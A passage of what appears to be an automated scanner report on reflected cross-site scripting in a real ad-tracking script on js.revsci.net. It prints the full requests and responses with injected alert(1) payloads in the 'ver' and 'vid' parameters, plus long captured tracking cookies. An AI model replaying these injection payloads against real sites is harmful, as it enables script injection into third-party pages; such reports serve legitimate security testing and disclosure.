4+Qqc0EEM9v48NUaCuTXadlOKl6oEJXijoNSBnJvehtYc2Tt1shetJDNMMxa5Kr6u2BSwMi3VmMON91ModKkwrHWmcdckgI+wic36jyg2i7m+A7L7k4QS/u4frTqUxraiP100y06o+VZcc9tZ+9r08TNxAozPhmxNBswBe+MUCpJcZOE/a4mEVeMUE00pIZ/Cl4q89t7HHvyEDHUJKWd+chMAc4BIHiGC2espd9xJ9uezlS7j58VHAzY4cDoPG9HqVz4BLwrelGJRQ+vEp//7RRqG+lxsCG1t//t7i1+lgnqXSSbtjg5YXET6sTq8hoQkLd+EPtUioVWXVZORVGCRsg2Konm5wX3+YuTBGRpo0nJp22OM5YKwQuB2azDdOIwkpoMzxawuKbupbRgMWZyw4izS3juV+GrhXJHCpDXR2iBRh+4inpxqC4uhApgkdsMhsO25Heugh6WaXGQ+WcA2VLbVvjikP9RSms6tZOHs+yf8M16aYMJIUF58e8Uqe0zn2o41FUtS121mYKP+/qI+wS5F7Zh6sn+sZMnN78sfxWEhxs2iXS2sVL7Hj2yupYTeSztI/zVXYwxUNtBLYBVljWkr2eJdUI55nK5GLE2DEzM4XoIM9HVqd3xTGRceYGXqTvZ5Oj9PrQaHEXejfNqNUkVt1KoOBQgPMAXJQxXlNhCNtPlexE+mJdoS03AZbMVwsJOStchneQ2jegEYuZGMterT7a1Jyf/bAIDJdvtPjfHPHGFSqkcXLsVvVgG9iP6EnwtyKUu/nGiRbB1Ua0mn1h8oNlvPW6GwuW4ROKZgYqlrlCV0uJovub26/SG4BV8d6fPJ8Yyzo9dBNXXjcqxyPNilXzhDwW7/YR1FczjeIJoqG5Whuwcn+6iBH7PQmVBcCB6Gfb1Bh4hvlq9sj+HGWPxAVJbkUEPr2divxHawozhlrrwarFkG8xmtaFDQsZtLADn987gJviLi/ynq7quSDHxKl7ec8yEETlPZY+XMqjpCnrO1hbcbmXc6fNwO+ee5Fb4rDSotXCJLLrGIZEoKsZ2/Tm/NtZ6TYpY4D6p067FjHgAMo+PrJduun9GfQzip2XlSMu9Hwqf63ZzXA//CFAVvuwNdCsQ0r1sMO/3MmQGbrtI6FfdqfBRQU6Ch/QEnMwOcLtFJajNRpHECIGA/NHN/jhVpZlgEBZVFx3osemVd+DCUef6vduRtxIxmmuD5uQg5z2tgX0J/Vj92MtHEeGFLozcMIzQ2ewgP3sBMvJeocw4zHYtdEXfqPmUhcRIIoQh+DAbjKQMj9+XIulQLr/FsOurshu62U75m45J7nYuUBsbiwyRaE/VZ"; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rtc_k8KG=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; rsi_segs_1000000=pUP94zmhOXMMH/C1v6FY5BD9CU6duy7ESpLgzGDKYyViGwmWW18bAQsYoAM+8HjFdJtFJWRCiLHBLDbWsPcI86yrtpktmfFacilUsrkfIWWKJiDdQnsDK82st/RBdHlSiCArToI74iBMHEIM6aRZ+ctyPyV2AcskZoa93bnD+7KzmMsYNaQWBrrYkNUezvQnLXGkhVG05Odz4K2YkQ7efGHGdJsOKQEkcQBYjtqaS6H7ZlDNGWHeUbBT+7iWjqkltSlqdFkY5ZCSD/LpMe6oE2LhWxsHk9CQb4f/4DBRvVR+Vsn3Wa2otHHl9DcyWQkxt+HNZk80xAqzN7umu7qJn1io7bu4IlqZWRAwUL/2riYdQyqUN2xVKYYypoVq1rD+CHWBoax0NCsrkHXbllfg48mnErvVtscNhDauRsHqShGST1ntuJP8Y2uTzuL21JyFn9D8BzYJI7XWgqgHY3hwgF1X4Spu79NlxqFyDqacIxYDmgj/c/80HbjalDyO2MjzVEQUdlANyAYn0j8EbYmxQKxsM6Rx3taFnmBYEmerFK8BfqeoKPoaXWO+nwv0ryXCZUva1SDjlo2wVhjQ76dAQ1KhNRC+7n6erq2kuZ1UHS7gGJ+a8IPLnbMauEqtWz/vfr9PAbndBB364psLhQxsNBZ/V+G5/rjrxQ6XCrYppz+AmSwLTlzgnXYOZE+rGQrANefuO3zqAEj7Orx7bW+c7SVq/vKvEfxbwhQK4Bb0D6+TT7bmiEPzBBOMjJtdSmdMA/UlA/1ADQ==; udm_0=MLv3NyEJZjpr3xSpL/sKOUxICxpURCNKVG8JBfsMOWr4c1ruOor8IW57ubLruJ70uAvWzxrBuHPGjOV0Yl999w9PWZEwp6XsRgcj+GkbCgPiYv9OYis//qNYlXaQsRkv1/9n8rbpls3/lg3b/9yLcovhjH8xhVus+bOGmVMfi7o7gawXwNvz26uIS28JGVLlC25P0hSiX8y1K25Ud7EXnL8DDb8pkUWpjvKZpMzKbPpZV94WqnSr172thZ8syzScr9cZG9oqnzD7bqSMJL5BQKcgxSuou8ECw+GXnkdl4OmbY2FbSYlCDRgc+/c6lhFH7jE0YNiubrzPt27J/JEc0Gs+XkI+Ebd1WvYw9/Xd7ftCSDR0Zwe8AhR6iKptca2vjFNTTKo+OkkLJW2FIsLYkAONGVJ9hOmW5e084U7uw0vM+Lhdzw9TqVu5ygVCjUYWXFmCqrrrRk62v1d6cSVtIHFIJ4lePrRIuyqlN2ALWcWNJ2nVPNQCtG6Dh8DEERFi+XoP1wPFhC0GiF7wn0MHND/wCWXx/JWKUU+VC34cUxuUta3r3XuTvx4d+vBQXuDPDnw29QIFptXZW6fOOuymtApEj21aZsv0egu11Apu04LD/roZjbpAC6QGunZcYL9ssZpQjWQYMBZlGqIfgh3iuuWUsPHTBGUDt5cscdNfS7TKpmHXmthcbc/d7e+/MnAdrT/1ZehbDdCHZQeWj6mIfzSpZ8cC3Zk24ZglqRgwNFbilMuOn3DcO2ugB4zdEQcmVaaz6YHh+JNmmLMjl2TA24PK3xD+fbpmhzFvEBjIi7clvv9qOiJtouwDDd2RQYT2Ep3F/HnCv/GaCR4wdJNb6Izjx2OU4EC6SMnmhzRJZx1Mvbeyktq11Zi2w55ZWgZls7Q7wzCg65f8+2GBHdPcBi0xQFO8j756qtOn/3dAStKIMF35glzGEz2NyJbHKXBtkH2X19gpB6ax9rOyGogvW99/utdnqqUGrzn/kEpQnDa2kEUk811wVSbL6q60O/bbCiUNeKz3rRkQPFP8+aD6V0zGLjDPKncsy1hNjN1jRpSMXKxDqVRdpcYwttiPkWREhaInub+YWVtT1oXubfLiNHV9UJeD2k0fkb7r3mvCCEYCbYbJQQbyzKSxCaY/3lu5/BahDewpho2bntF1PV9ZAIHz13i3/QIFqKunfGZergISuHHcpD6S5AkX5oSnOVAymhcRYncJuDVR7w3F5RLVa7EHGecTDqlEvm59ZX8cTQ5bzJ1Abtx13XYb7j1u7zVIfeXneYS+0GlZAi3yogjdpiPiBw1EH7P9o/q1Zg7W9IkgH/YVzge06UUUK4rT1AoMaf8i7WK1YW21srH7XQ0Ot8fltujTte/8QbNhYbI7IG0rOSBbSov47vv3n6MjpPrAf5qhMAXLUGatxFcl4tsfOkACgIvhTn8I6rAXvEYYlNAxsCfXmnI0p8hQiJERchlgDMgmxns4Ly+e/p6PMLWHzPtN5c+q+g+IPQG377uaac8DJzK02AriShlM9dZKDYxgqlG+zJ24k7ffFdBB4+ibuSXB8ld6ZqZ1O9+R2LgBbwAuSwdkT4ftgIBysXBOapY6pYD+cT84SMwsgTEMDgtYrO7hiyO4Q+hxJwlkbjJNzvJXX1Y8JfAsyg8ZWg53ml7FrAz2kysF0CgU8P9ILnou5Ckc6kCRS2UU0ZoeR188Jg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv3NzMNbjpn3tMbCbIqoNFEGQs1ZjpCLdRc6ERWG3v699SMuzk30y/wRMtFXES76MFWkxC8CVfRJHB49Hg0wsqhp0vQaqXlpmJ62BjFdh1m7Vo610Asme4IheEqDAiARVHa9wiYUb7uHa1cx/kBqlirnd4yhmaJJsLvBBnz/g4QJvj6Xt89sGyH/RLJ0FPyfFVHFfa8ktv+BbCOMBpT7ek0txcX7EEeKyzFSrqH8wCJgA+OZbpjvRiieAmo+r/fDJxBuq61gdqWx+3MINEEUBl3MqtzJ1Giy5PuxRcNZRy9O2G0/ogYYaFkGkwfEBjj/WrdFy97V65pRv9ajZ9EXK5SsYBqwM4166mn7UKTfMdrMcenDTn4PBYgPfZdeOLSCIchdFzAm2/9KlHyiO5XJFu6vcBA33DULGnkigOOwQE2hHovI//1OgMoyd0SIk2spRNGGP1tZo6dhtsusZzGFy815YJqcuHXtJlthLH2yEONPT5ETtDMs2MN+BZNR3utoi9bpL/W/gmV3psJqp5uCawpyUVVsYo2oTdtEeiq/xaQop1qrSWhukmIiovwXalWSmDHwt0G5gUSskG1mMfdp+2IJHeo4+SRkvOjfST/2I4ZfHoTkyo3o7HQPwZ/R6GnxvY13EKTBlig2nK/aNlPhSYj/0Apn8/r7a8XoLkCQ4aQGSNRMU2agnyWKDr1gGQ740DsZaPV5zS+UFzzrv1fGaJVErwCPOwFrnM7U7MYSIHPmIECXZ+q+1ITQSx8HS4eC0Kbdk6O71gFDFm6ihA9kjiBqY/SI7W0x6P5YGbcVqoTqDAjfLt+u7sfSzHyKCpszp1EwsdsvWQn5zQmPc2z71rLw5GeNOZ01vbOr9LEriiYAzzJ37TDHKLxsiXGxddwGqgZvwiyRxpahg8hHsEMYuG/FRKllZj0PGK08nmOncY2PMaVPsxSlmMmbam9bRaNgWevk4I71wmH/xI9dwhstsXfH2g2Sw6XOU94ZGnc8qcZUHtfWRWfaRf3fGf0mv6WwwpKIo80CJmUOCs/tJc1CxB3aL7hSrMk8xjXLek68Nu0KOBRTvOBgYeV7lflCyu9VQzo682FLXxAWeFIHDgEx54WTZA70gi4XaJeBjOxGpEbcJW96lsaT1qGhwMnod1a9XPOt3bKXq7lMkcTMNYt+d+4ngOjwPjgNwmVIMtrkQDUs8+p2cNMJjh7GUVevrizwEg9vBKTybA9hEL6Q/HzI0i2UHlSCghS7IjjtarCvhkD7vSpJftkzl7yrfLsdEAZL7A/4iBB5wYBg33WVfCn9OMZuUclLJerEVZXW5etC3PU/J8gEl0nwRdsUIFNAE7Nu+4PFeqHdjR3Zl/oj5tNzLpft+pUMRUFQ59wAjByd4EGLj0tby/HJAkYyXtdqyx24A/Fb2nxJePslRcoX8Ap5QZXuPZfmUDs7XCebz0/OhMgenLwIyKbxGMFCL23s45GF3uH/jqohO39kv9lz2koFCJmgwLu8gpVWwi1fe2EbOOv+YQm28JelwV9xUrTYT0vTjd49sICxuqpXyvht2Uku52Q6nerELXx+abvlah0z+BLsJsho5foVVaqCBpa3uYBzmBi9qI4KiQH4MBBb3Mu0AcdJ7gkDYZYIuV/KDOOYUHWM6Zs/4cDvae18I3bh6nYMbNW8oQiVkTWYcZExvv8wvE6Sw9maTPHD10t5rF4T1At5cUEco4oSpcvymjQJmt+f38P3iPOWf13HkbG4C+x2CgYeC5I08oPDeVeYM+n/5vvWE+EM6N54TQw4SXdP1H+bGgMaikVwJQ7pHAT1r4cK8or+INX6cjQX3mL94fhVMJedFffq/8ALJuFnph0m4G7CZdx12OtZ+7fZlIogNw=; Domain=.revsci.net; Expires=Wed, 27-Jun-2012 03:00:56 GMT; Path=/
Last-Modified: Tue, 28 Jun 2011 03:00:56 GMT
Cache-Control: max-age=3600, private
Expires: Tue, 28 Jun 2011 04:00:56 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 28 Jun 2011 03:00:56 GMT
Content-Length: 6236

//Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...
;}window[rsi_csid]=new rsiClient(rsi_csid);
if(window[rsi_csid])window[rsi_csid].rsi_ral(1);else rsi_ral(1);
if(window[rsi_csid])window[rsi_csid].rsi_r();else rsi_r();
A10868.DM_addEncToLoc('ver', '2.288741';alert(1)//23a21b5eb52');
A10868.DM_addEncToLoc('clen','432');
A10868.DM_addEncToLoc('vid', '6127792');
A10868.DM_addEncToLoc('pid', '456378');
A10868.DM_addEncToLoc('pli', '2120305');
A10868.DM_addEncToLoc('sid', '1887835'
...[SNIP]...

1.315. http://js.revsci.net/gateway/gw.js [vid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the vid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload daf36'%3balert(1)//6fb0941c0 was submitted in the vid parameter. This input was echoed as daf36';alert(1)//6fb0941c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=432&vid=6127792daf36'%3balert(1)//6fb0941c0&pid=456378&pli=2120305&sid=1887835&ali=3130307&cid=9518378&p=275&ref=http%3A//d.tradex.openx.com/afr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Di& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=1887835
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_POOa="MLsXtSHtJzpvJ5G+ytKgurD8xZbguKBAUoXMlOhbDZEIyUnXvCY/f7eEYgF17PuoYfq5CEudAjRL1GbcO/7J60JGGit5YpjkTi94QZ++NpMovzSXDH2egifUZfAGA4x6DJ1ef7CxdWNM1Ath6aEIxixI6X+ZFnchP7su1AfMVdmbt4uXOwFbARuez9yGUILljsr8iZpbE0YOpDX/I8dVzRiqWCbJWrig0+Ygf+aONwJLVAG9Qci4qyJ0OEoyF/C9WVXIsdxjo58DG+M5Z24kOQTzZzl9WL1fBtLwQMgZBQn3zjpdo1exh0bsmOsoJq0J12qVAbFThsQz5IDt7CkQiyleF6OSs84OYdv+QMiLgpV9FRrdszNyJ1Z1zdWSL2eBUsGyJ9LgmSypFoj2IJYq+CYjKuJh1q5SotTKfyoRjtQMIlYaw1bYORoY2KsywkRFoyeuXaDHr+kubAEaiR4mv+ueQqOTBqIL8EaJVKNeK14CvyaGEGiOf4xVidLPtWVp2cvmx+x8USaJltoPt52X7Qo3G9b5gMMSX/O7j4QHvGs068mYD7Jt0w3zVBoiChmjJijUOZI7pBIcB7pcDyhPXu0ekU8FNf+EZ2maUs/pJNfuLWhxzdwV8IFJvoDuP/k2F1fAFaKV5m3tJu4Kbsthsmobn+AEKG1fmaDEW/Rl9s4FMKHX6d1NaUg1aGoUNW9vlSNUkNQyg5xbyIqlIG60UCqagEd7akjIlHqEKgyVPmZRXCZsks8KUgS+ggIDyN3nm8Q9ybV7DYPDsaMVL9l30qTRehQMpViyu4aazqatyngUryJYSDMAw3MoxCYvzLg4VI0yQpDT4YM7EL/sjZF3GBKEvexarBUJ8IhXSEgBy8YPlIb7J1fU36Xok+aMd7hKisl1fiJ5L9WWlvPngVsNahS23h2ilcpGbvT7P8I1H67JHJs0T5zOxlbKA0tgt1XwzumjmY1MFQG7npmmjsejndnQNq6/1ECJ9acOs9TLs4eapvNZQ+7+XrqZbKo7Bg0R+TcmXPDWqHBSsNSRS6PEPs+B0Hn8vC43OULFX/VMEqBD7Um7K4PkKLzZ45EK/e7fMS47h1FG+y0pSm42Y6HkNkhnxCrDjBcgROJzznpsuIbJZQHyXl8j4cUgGiZBxqQSPqhFr9mtghL4GOwp2YKJAlwRxM+bjbCTXIMg2izcge98/uLVSVc1qMa6m03veDkqyKsoaPFeEkA2OOgtvIAoNV11Moc2Q+7bMZeZl4CDzl94tevQyhvCzcZDWHw1CA4qMQBfMOZr4xEG93vu+i9zYjr9xG1HA/txVLLWfK/bAKKmN6fqLbcY2pW5lpqW2FJxi65P63qhCJt0YP0gMlFmQMsihPn4MV2v59cKlKSELXAgqbss7TVL5/B0TuuGU260dpfoFfufumXLCpyIlXH1DRvhprlFYuymPmKAKQrrAUgRzvmuXaEHlH5jRUx1uEFjhqo7hOpqY+eQR+el8zb4xYyA0B3Fjnz5zUZGXZEUOHOUu5GVkR50a/qnzLWhgVLpMsIBeAsDZwR2196JkcyvgVxTSCglY6cvfSw1V+yzCTCmcXLsyRIBE5QZz41zi2x/Bw=="; rsi_us_1000000="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"; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rtc_k8KG=MLvf+AU1J7hm54bujhlfWXKJr/9l8AjRdIhRtgehmAuXhUGp8B7/CQIsArpwSo+VLF28ZNS2S7URNdFVgT2toHIocSlReT4zruqoYXCoI2SggYZ4eidTc+hpg4KrXO6SEhax803rzvuXOxLKx7L+AIASaoJpQTPdk1Azc/M2QSIjyLNL+lfte16ArdGg5LcGSGKLVqFEL3hNYJhvOeifQQkmRlLLetSSVOgPda3nTm09AZkqR8SvY9mMV5cr5vsSit6pm+A86IInqBi3AmtJQ4liz8ePAED+33DjUs9O2L9m1vX83GC8h2NRNt3iUHOEeKS69tLoSdqs5rX0cWzZp32RKBEW0Z9rNRJGpkTde/v7lHiLFXsc9eCb7yWL7SOGIJ+F5LWD4E8tN7GhtXxc1aqOmFGQQLJHmdqjQBYllN0V/U4iipYnyFE6KpO3YqIY9PUmKQkT4QZnWfRIUBGbyN2d+EK84CjzA7KccKeC7Ts9N9eptYv5uLYPhmUUv4h5NIq9k3+BQvwxEOJtXrHQlxyv9fB4Xm2nY42ehPmOf4KK1ay4QoM/vbCOX0rmRLcLcL5au17mduKLdgpls+iQdyhT/6hU0mDsqlls2kmBlOFMeD0ztB/FZPRcDRv9WT/Td4zOt2fom+0jfOnM2Bz/sl4cdUMk3EgwtrA0o+D83Itf9UKp5m1kmvhOl7pYi341zykhkWz6eUs1tzNUxVzvPhIgKCMI7qpV0bhD2jZsETAYvRVEZ2nqRDzGD3qoLUay9t763tH5Lzl+2sF5GYTqIp+reIbKx/kOMxsIvpRbsJY5gJV3mQV2hkS0SPxeC0iA7spWhkAva5iT36eHpVUOke2QaZbXF/BEM/OUsFfpAxn/